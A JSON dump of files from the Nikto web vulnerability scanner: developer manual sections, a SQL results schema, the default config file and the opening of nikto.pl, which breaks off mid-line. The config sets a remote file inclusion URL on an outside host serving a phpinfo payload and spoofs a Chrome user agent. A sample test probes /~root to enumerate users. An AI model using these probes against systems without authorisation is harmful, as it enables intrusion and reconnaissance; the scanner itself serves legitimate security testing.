class=\"titlepage\"><div><div><h3 class=\"title\"><a name=\"id289774\"></a>Standard Methods</h3></div></div></div><p>Several standard methods are defined in\n         <code class=\"filename\">nikto_core.plugin</code> that can be used for all\n         plugins. It is strongly advised that these should be used where\n         possible instead of writing new methods.</p><p>For some methods, such as <code class=\"function\">add_vulnerability</code>\n         which write to global variables, these <span class=\"emphasis\"><em>must</em></span> be\n         the only interface to those global variables.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">array <b class=\"fsfunc\">change_variables</b>(</code></td><td><var class=\"pdparam\">line</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">line</var>;</code></td></tr></table></div><p>Expands any variables in the line parameter. The expansions are\n         variables defined in the global array <code class=\"varname\">@VARIABLES</code>,\n         which may be read from <code class=\"filename\">db_variables</code>, or added by\n         reconnaisance plugin methods.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">int <b class=\"fsfunc\">is_404</b>(</code></td><td><var class=\"pdparam\">uri</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">content</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">HTTPcode</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">uri</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">content</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">HTTPcode</var>;</code></td></tr></table></div><p>Makes a guess whether the result is a real web page or an error\n         page. As several web servers are badly configured and don't return\n         HTTP 404 codes when a page isn't found, Nikto attempts to look for\n         common error pages. Returns 1 if the page looks like an error.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">string <b class=\"fsfunc\">get_ext</b>(</code></td><td><var class=\"pdparam\">uri</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">uri</var>;</code></td></tr></table></div><p>Attempts to work out the extension of the uri. Will return the\n         extension or the special cases: DIRECTORY, DOTFILE, NONE.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">string <b class=\"fsfunc\">date_disp</b>(</code></td><td><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code></code></td><td><code>;</code></td></tr></table></div><p>Returns the current time in a human readable format\n         (YYYY-mm-dd hh:mm:ss)</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">string <b class=\"fsfunc\">rm_active</b>(</code></td><td><var class=\"pdparam\">content</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">content</var>;</code></td></tr></table></div><p>Attempts to remove active content (e.g. dates, adverts etc.)\n         from a page. Returns a filtered version of the content.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">string <b class=\"fsfunc\">get_banner</b>(</code></td><td><var class=\"pdparam\">mark</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">mark</var>;</code></td></tr></table></div><p>Pulls the web servers banner. This is automatically performed\n         for all targets before a mark is passed to the plugin.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">boolean <b class=\"fsfunc\">content_present</b>(</code></td><td><var class=\"pdparam\">HTTPcode</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">HTTPcode</var>;</code></td></tr></table></div><p>Checks the HTTPresponse against known \"found\" responses. TRUE\n         indicates that the request was probably successful.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">string HTTPCode, string content <b class=\"fsfunc\">fetch</b>(</code></td><td><var class=\"pdparam\">uri</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">method</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">content</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">headers</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">noclean</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">uri</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">method</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">content</var>;</code></td></tr><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">headers</var>;</code></td></tr><tr><td><code>boolean </code></td><td><code><var class=\"pdparam\">noclean</var>;</code></td></tr></table></div><p><span class=\"emphasis\"><em>Deprecated</em></span></p><p>Performs a simple HTTP request to URI using the HTTP method,\n         <em class=\"parameter\"><code>method</code></em>. <em class=\"parameter\"><code>content</code></em> supplies\n         any data to pass in the HTTP body. <em class=\"parameter\"><code>headers</code></em>\n         allows any custom headers to be placed in the request.\n         <em class=\"parameter\"><code>noclean</code></em> is a flag specifying that the request\n         shouldn't be cleaned up before being sent (e.g. if the Host: header\n         is blank).</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">string HTTPCode, string content <b class=\"fsfunc\">nfetch</b>(</code></td><td><var class=\"pdparam\">uri</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">method</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">content</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">headers</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">noclean</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">uri</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">method</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">content</var>;</code></td></tr><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">headers</var>;</code></td></tr><tr><td><code>boolean </code></td><td><code><var class=\"pdparam\">noclean</var>;</code></td></tr></table></div><p>An updated version of fetch that uses a local, rather than a\n         global request/result structure. This should be used in preference to\n         fetch.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">hashref <b class=\"fsfunc\">setup_hash</b>(</code></td><td><var class=\"pdparam\">requesthash</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">mark</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">requesthash</var>;</code></td></tr><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">mark</var>;</code></td></tr></table></div><p>Sets up up a libwhisker hash with the normal Nikto variables.\n         This should be used if any custom calls to libwhisker are used.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">string <b class=\"fsfunc\">char_escape</b>(</code></td><td><var class=\"pdparam\">line</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">line</var>;</code></td></tr></table></div><p>Escapes any characters within line.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">array <b class=\"fsfunc\">parse_csv</b>(</code></td><td><var class=\"pdparam\">text</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">text</var>;</code></td></tr></table></div><p>Breaks a line of CSV text into an array of items.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">arrayref <b class=\"fsfunc\">init_db</b>(</code></td><td><var class=\"pdparam\">dbname</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">dbname</var>;</code></td></tr></table></div><p>Initialises a database that is in <code class=\"varname\">PLUGINDIR</code>\n         and returns an arrayref. The arrayref is to an array of hashrefs, each\n         hash member is configured by the first line in the database file, for\n         example:</p><pre class=\"screen\">\"nikto_id\",\"md5hash\",\"description\"</pre><p>This will result in an array of hashrefs with parameters:</p><pre class=\"screen\">array[0]-&gt;{nikto_id}\narray[0]-&gt;{md5hash}\narray[0]-&gt;{description}</pre><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">void <b class=\"fsfunc\">add_vulnerability</b>(</code></td><td><var class=\"pdparam\">mark</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">message</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">nikto_id</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">osvdb</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">method</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">uri</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">data</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">mark</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">message</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">nikto_id</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">osvdb</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">method</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">uri</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">data</var>;</code></td></tr></table></div><p>Adds a vulnerability for the mark, displays it to standard out\n         and sends it to any reporting plugins.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">void <b class=\"fsfunc\">nprint</b>(</code></td><td><var class=\"pdparam\">message</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">display</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">message</var>;</code></td></tr><tr><td><code>string </code></td><td><code><var class=\"pdparam\">display</var>;</code></td></tr></table></div><p>Prints <em class=\"parameter\"><code>message</code></em> to standard out.\n         <em class=\"parameter\"><code>Display</code></em> specifies a filter for the message,\n         currently this can be \"v\" for verbose and \"d\" for debug\n         output.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h3 class=\"title\"><a name=\"id290403\"></a>Global Variables</h3></div></div></div><p>The following global variables exist within Nikto, most of\n         them are defined for internal use and their use by plugins is not\n         advised. Several have been deprecated, these should not be used by\n         plugins.</p><div class=\"variablelist\"><dl><dt><span class=\"term\"><code class=\"varname\">%TEMPLATES</code> (read/write)</span></dt><dd><p>Hash to store the HTML and XML report templates.</p></dd><dt><span class=\"term\"><code class=\"varname\">%ERRSTRINGS</code> (read)</span></dt><dd><p>Hash to contain all the entries in db_404 - a list of\n                  strings that may indicate a 404.</p></dd><dt><span class=\"term\"><code class=\"varname\">%CLI</code> (read)</span></dt><dd><p>Hash of passed CLI parameters</p></dd><dt><span class=\"term\"><code class=\"varname\">%VARIABLES</code> (read) (write)</span></dt><dd><p>Hash of contents of the entries in db_variables. Plugins\n                  should only write to this hash in the reconnaisance\n                  phase.</p></dd><dt><span class=\"term\"><code class=\"varname\">%TESTS</code> (read) (write)</span></dt><dd><p>Hash of the db_tests database. This is only intended\n                  to be used by the tests plugin, though it could be used by a\n                  reconnaisance plugin to add tests on the fly.</p></dd><dt><span class=\"term\"><code class=\"varname\">$CONTENT</code> (read) (write)\n               (deprecated)</span></dt><dd><p>Global variable to store data from a fetch or nfetch. A\n                  local variable should be used instead</p></dd><dt><span class=\"term\"><code class=\"varname\">%NIKTO</code> (read)</span></dt><dd><p>Hash which contains internal Nikto data, such as help\n                  for the command line parameters.</p></dd><dt><span class=\"term\"><code class=\"varname\">%REALMS</code> (read)</span></dt><dd><p>Hash of data from db_realms.</p></dd><dt><span class=\"term\"><code class=\"varname\">%NIKTOCONFIG</code> (read)</span></dt><dd><p>Hash containing the data read from the configuration\n                  files.</p></dd><dt><span class=\"term\"><code class=\"varname\">%request</code> (read) (write)\n               (deprecated), </span><span class=\"term\"><code class=\"varname\">%result</code> (read) (write)\n               (deprecated)</span></dt><dd><p>Global libwhisker hash. This should not be used; nfetch\n                  or a local hash should be used.</p></dd><dt><span class=\"term\"><code class=\"varname\">%COUNTERS</code> (read) (write)</span></dt><dd><p>Hash containing various global counters (e.g. number of\n                  requests)</p></dd><dt><span class=\"term\"><code class=\"varname\">%db_extensions</code> (read)\n               (deprecated)</span></dt><dd><p>Hash containing a list of common extensions</p></dd><dt><span class=\"term\"><code class=\"varname\">%FoF</code> (read) (write)</span></dt><dd><p>Hash containing data for each extension and what the\n                  server produces if a request for a non-existent file is\n                  requested.</p></dd><dt><span class=\"term\"><code class=\"varname\">%UPDATES</code> (read) (write)</span></dt><dd><p>Hash containing any updates that need to be sent back\n                  to cirt.net</p></dd><dt><span class=\"term\"><code class=\"varname\">$DIV</code> (read)</span></dt><dd><p>Divider mark for the items sent to standard out.</p></dd><dt><span class=\"term\"><code class=\"varname\">@DBFILE</code> (read)</span></dt><dd><p>Placeholder used to hold the contents of\n                  <code class=\"filename\">db_tests</code>.</p></dd><dt><span class=\"term\"><code class=\"varname\">@BUILDITEMS</code> (read) (write)\n               (deprecated)</span></dt><dd><p>Array to hold information for tests to act on later.\n                  Use should be avoided, a local variable should be used\n                  instead.</p></dd><dt><span class=\"term\"><code class=\"varname\">$PROXYCHECKED</code> (read)</span></dt><dd><p>Flag to see whether connection through the proxy has\n                  been checked.</p></dd><dt><span class=\"term\"><code class=\"varname\">$http_eol</code> (read) (deprecated)</span></dt><dd><p>Contains the http end of line pattern.</p></dd><dt><span class=\"term\"><code class=\"varname\">@RESULTS</code> (read)</span></dt><dd><p>Array of reported vulnerabilities, should only be\n                  written to through\n                  <code class=\"function\">add_vulnerability.</code></p></dd><dt><span class=\"term\"><code class=\"varname\">@PLUGINS</code> (read)</span></dt><dd><p>Array of hashrefs for each plugin. Used internally to\n                  run plugins.</p></dd><dt><span class=\"term\"><code class=\"varname\">@MARKS</code> (read)</span></dt><dd><p>Array of marks to indicate each target.</p></dd><dt><span class=\"term\"><code class=\"varname\">@REPORTS</code> (read)</span></dt><dd><p>Ordered array that reporting plugins should be run in.\n                  Used for efficency on calling reporting plugins.</p></dd><dt><span class=\"term\"><code class=\"varname\">%CACHE</code> (read) (write)</span></dt><dd><p>Containing the URI cache, should only be read/written\n                  through <code class=\"function\">nfetch</code>. Members:</p><div class=\"blockquote\"><blockquote class=\"blockquote\"><div class=\"table\"><a name=\"id290838\"></a><p class=\"title\"><b>Table7.4.Members of the <span class=\"structname\">cache</span>\n                  structure</b></p><div class=\"table-contents\"><table summary=\"Members of the cache\n                  structure\" border=\"1\"><colgroup><col><col></colgroup><tbody><tr><td><em class=\"structfield\"><code>{uri}</code></em></td><td>URI for the cache</td></tr><tr><td><em class=\"structfield\"><code>{uri}{method}</code></em></td><td>HTTP method used</td></tr><tr><td><em class=\"structfield\"><code>{uri}{res}</code></em></td><td>HTTP result for URI</td></tr><tr><td><em class=\"structfield\"><code>{uri}{content}</code></em></td><td>data for URI</td></tr><tr><td><em class=\"structfield\"><code>{uri}{mark}</code></em></td><td>mark hashref for URI</td></tr></tbody></table></div></div><br class=\"table-break\"></blockquote></div></dd></dl></div></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id290916\"></a>Test Identifiers</h2></div></div></div><p>Each test, whether it comes from one of the databases or in code,\n      must have a unique identifier. The numbering scheme for writing tests is\n      as follows:</p><div class=\"blockquote\"><blockquote class=\"blockquote\"><div class=\"table\"><a name=\"id290930\"></a><p class=\"title\"><b>Table7.5.TID Scheme</b></p><div class=\"table-contents\"><table summary=\"TID Scheme\" border=\"1\"><colgroup><col><col></colgroup><tbody><tr><td>000000</td><td>db_tests</td></tr><tr><td>400000</td><td>user defined tests (<code class=\"filename\">udb*</code>\n            files)</td></tr><tr><td>500000</td><td>db_favicon</td></tr><tr><td>600000</td><td>db_outdated</td></tr><tr><td>700000</td><td>db_realms</td></tr><tr><td>800000</td><td>db_server_msgs</td></tr><tr><td>900000</td><td>tests defined in code</td></tr></tbody></table></div></div><br class=\"table-break\"></blockquote></div><p>As much data as possible in the <code class=\"varname\">%TESTS</code> hash\n      should be populated for each new test that is defined in code (plugins).\n      These fields include URI for the test, message to print on success,\n      HTTP method and OSVDB ID. Without a 'message' value in\n      <code class=\"varname\">%TESTS</code> output will not be saved in HTML or XML\n      reports. Not all tests are expected to have a uri, method or OSVDB ID.\n      Here is an example of setting those fields:</p><pre class=\"screen\">$TESTS{999999}{uri}=\"/~root\";\n$TESTS{999999}{message}=\"Enumeration of users is possible by requesting ~username\";\n$TESTS{999999}{method}=\"GET\";\n$TESTS{999999}{osvdb}=637;</pre></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id291044\"></a>Code Copyrights</h2></div></div></div><p>Any new or updated code, tests or information sent to the author\n      is assumed to free of copyrights. By sending new or updated code, tests\n      or information to the author you relinquish all claims of copyright on\n      the material, and agree that this code can be claimed under the same\n      copyright as Nikto.</p></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"troubleshooting\"></a>Chapter8.Troubleshooting</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id291068\">SOCKS Proxies</a></span></dt><dt><span class=\"section\"><a href=\"#id291078\">Debugging</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id291068\"></a>SOCKS Proxies</h2></div></div></div><p>Nikto does not currently support SOCKS proxies.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id291078\"></a>Debugging</h2></div></div></div><p>The major route to debugging Nikto requests is to use the\n      <em class=\"parameter\"><code>-Display</code></em> with v (verbose) or d (debug). This\n      will output a vast amount of extra information to the screen, so\n      it is advised to redirect output to a file when using them.</p></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"licences\"></a>Chapter9.Licences</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id291106\">Nikto</a></span></dt><dt><span class=\"section\"><a href=\"#id291117\">LibWhisker</a></span></dt><dt><span class=\"section\"><a href=\"#id291129\">Tests</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id291106\"></a>Nikto</h2></div></div></div><p>Nikto is licensed under the GNU General Public License (GPL), and\n      copyrighted by Chris Sullo</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id291117\"></a>LibWhisker</h2></div></div></div><p>LibWhisker is licensed under the GNU General Public License (GPL),\n      and copyrighted by Rain Forrest Puppy.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id291129\"></a>Tests</h2></div></div></div><p>The web tests are licensed for use with Nikto only, and may not be\n      reused without written consent from Chris Sullo</p></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"credits\"></a>Chapter10.Credits</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id291149\">Nikto</a></span></dt><dt><span class=\"section\"><a href=\"#id291161\">Thanks</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id291149\"></a>Nikto</h2></div></div></div><p>Nikto is written and maintained by Chris Sullo and David Lodge. LibWhisker was written\n      by Rain Forrest Puppy</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id291161\"></a>Thanks</h2></div></div></div><p>Many people have provided feedback, fixes, and suggestions. This\n      list attempts to make note of those people, though not all contributors\n      are listed. In no particular order:</p><div class=\"itemizedlist\"><ul type=\"disc\"><li><p>Nikto 2 Testing: Paul Woroshow, Mark G. Spencer, Michel\n            Arboi, Jericho, rfp</p></li><li><p>Jericho (attrition.org/OSVDB/OSF).\n            Support/ideas/tests/corrections/spam and help matching OSVDB IDs\n            to tests.</p></li><li><p>rfp (wiretrip.net). LibWhisker and continuing\n            support.</p></li><li><p>Erik Cabetas for many updates and fixes.</p></li><li><p>Jake Kouns (OSVDB/OSF).</p></li><li><p>Jabra (spl0it.org) for XML DTD, XML templates and supporting\n            code.</p></li><li><p>Stephen Valdez. Extensive testing. We all miss you.</p></li><li><p>S Saady. Extensive testing.</p></li><li><p>Zeno (cgisecurity.com). Nikto mirroring.</p></li><li><p>P Eronen (nixu.com). Provided many code fixes.</p></li><li><p>M Arboi. Great support by writing the code to make Nikto\n            work within Nessus, as well as bug reports.</p></li><li><p>T Seyrat. Maintains Nikto for the Debian releases.</p></li><li><p>J DePriest. Ideas/fixes.</p></li><li><p>P Woroshow. Ideas/fixes.</p></li><li><p>fr0stman. Tests.</p></li><li><p>H Heimann. Tests.</p></li><li><p>Xiola (xiola.net). Web design and more.</p></li><li><p>Ryan Dewhurst. Domain guessing code.</p></li></ul></div><p>This document is  2009 Chris Sullo and may not be reused without\n      permission.</p></div></div></div></body></html>\n"
  },
  {
    "path": "nikto/program/docs/nikto_schema.sql",
    "content": "CREATE TABLE 'nikto_table' (\n  'testid' varchar(6) NOT NULL,\n  'ip' varchar(15) DEFAULT NULL,\n  'hostname' text DEFAULT NULL,\n  'port' int(5) DEFAULT NULL,\n  'usessl' tinyint(1) DEFAULT NULL,\n  'osvdb' int(11) DEFAULT NULL,\n  'httpmethod' text DEFAULT NULL,\n  'uri' text DEFAULT NULL,\n  'message' text DEFAULT NULL,\n  'request' blob DEFAULT NULL,\n  'response' blob DEFAULT NULL\n);\n"
  },
  {
    "path": "nikto/program/nikto.conf.default",
    "content": "#########################################################################################################\n# CONFIG STUFF\n# $Id: config.txt 94 2009-01-21 22:47:25Z deity $\n#########################################################################################################\n# This is the default config file. If you want to change it, we strongly suggest you copy it to nikto.conf\n# This will stop it being over-ridden when you git pull\n\n# default command line options, can't be an option that requires a value.  used for ALL runs.\n# CLIOPTS=-g -a\n\n# ports never to scan\nSKIPPORTS=21 111\n\n# User-Agent variables:\n # @VERSION \t- Nikto version\n # @TESTID \t- Test identifier\n # @EVASIONS \t- List of active evasions\n # Example: USERAGENT=Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID)\nUSERAGENT=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\n\n# RFI URL. This remote file should return a phpinfo call, for example: <?php phpinfo(); ?>\n# You may use the one below, if you like.\nRFIURL=http://cirt.net/rfiinc.txt?\n\n# IDs never to alert on (Note: this only works for IDs loaded from db_tests)\n#SKIPIDS=\n\n# The DTD\nNIKTODTD=docs/nikto.dtd\n\n# the default HTTP version to try... can/will be changed as necessary\nDEFAULTHTTPVER=1.1\n\n# Nikto can submit updated version strings to CIRT.net. It won't do this w/o permission. You should\n# send updates because it makes the data better for everyone ;)  *NO* server specific information\n# such as IP or name is sent, just the relevant version information.\n# UPDATES=yes  \t- ask before each submission if it should send\n# UPDATES=no   \t- don't ask, don't send\n# UPDATES=auto \t- automatically attempt submission *without prompting*\nUPDATES=yes\n\n# Warning if MAX_WARN OK or MOVED responses are retrieved\nMAX_WARN=20\n\n# Prompt... if set to 'no' you'll never be asked for anything. Good for automation.\n#PROMPTS=no\n\n# cirt.net : set the IP so that updates can work without name resolution -- just in case\nCIRT=107.170.99.251\n\n# Proxy settings -- still must be enabled by -useproxy\n#PROXYHOST=127.0.0.1\n#PROXYPORT=8080\n#PROXYUSER=proxyuserid\n#PROXYPASS=proxypassword\n\n# Cookies: send cookies with all requests\n# Multiple can be set by separating with a semi-colon, e.g.:\n# \"cookie1\"=\"cookie value\";\"cookie2\"=\"cookie val\"\n#STATIC-COOKIE=\"name=value\";\"something=nothing\";\n\n# The below allows you to vary which HTTP methods are used to check whether an HTTP(s) server\n# is running. Some web servers, such as the autopsy web server do not implement the HEAD method\nCHECKMETHODS=GET\n\n# If you want to specify the location of any of the files, specify them here\n# EXECDIR=/opt/nikto\t\t\t\t# Location of Nikto\n# PLUGINDIR=/opt/nikto/plugins\t\t\t# Location of plugin dir\n# DBDIR=/opt/nikto/databases\t\t\t# Location of database dir\n# TEMPLATEDIR=/opt/nikto/templates\t\t# Location of template dir\n# DOCDIR=/opt/nikto/docs\t\t\t# Location of docs dir\n\n# Default plugin macros\n# Remove plugins designed to be run standalone\n@@EXTRAS=dictionary;siebel;embedded\n@@DEFAULT=@@ALL;-@@EXTRAS;tests(report:500)\n\n# Choose SSL libs:\n# SSLeay        - use Net::SSLeay\n# SSL           - use Net::SSL\n# auto          - automatically choose what's available\n#                 (SSLeay wins if both are available)\nLW_SSL_ENGINE=auto\n\n# Number of failures before giving up\n# Set to 0 to disable entirely\nFAILURES=20\n"
  },
  {
    "path": "nikto/program/nikto.pl",
    "content": "#!/usr/bin/env perl\nuse strict;\n#VERSION,2.1.6\n###############################################################################\n# Modules are now loaded in a function so errors can be trapped and evaluated\nload_modules();\n###############################################################################\n#                               Nikto                                         #\n###############################################################################\n#  Copyright (C) 2001 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# Contact Information:\n#     Sullo (sullo@cirt.net)\n#     http://cirt.net/\n#######################################################################\n# See the COPYING file for more information on the License Nikto is distributed under.\n#\n# This program is intended for use in an authorized manner only, and the author\n# can not be held liable for anything done with this program, code, or items discovered\n# with this program's use.\n#######################################################################\n\n# global var/definitions\nuse vars qw/$TEMPLATES %CLI %VARIABLES %TESTS/;\nuse vars qw/%NIKTO %CONFIGFILE %COUNTERS %db_extensions/;\nuse vars qw/@RESULTS @PLUGINS @DBFILE @REPORTS %CONTENTSEARCH/;\n\n# setup\nGetopt::Long::Configure('no_ignore_case');\n$COUNTERS{'scan_start'}  = time();\n$VARIABLES{'DIV'}        = \"-\" x 75;\n$VARIABLES{'name'}       = \"Nikto\";\n$VARIABLES{'version'}    = \"2.1.6\";\n\n# signal trap so we can close down reports properly\n$SIG{'INT'} = 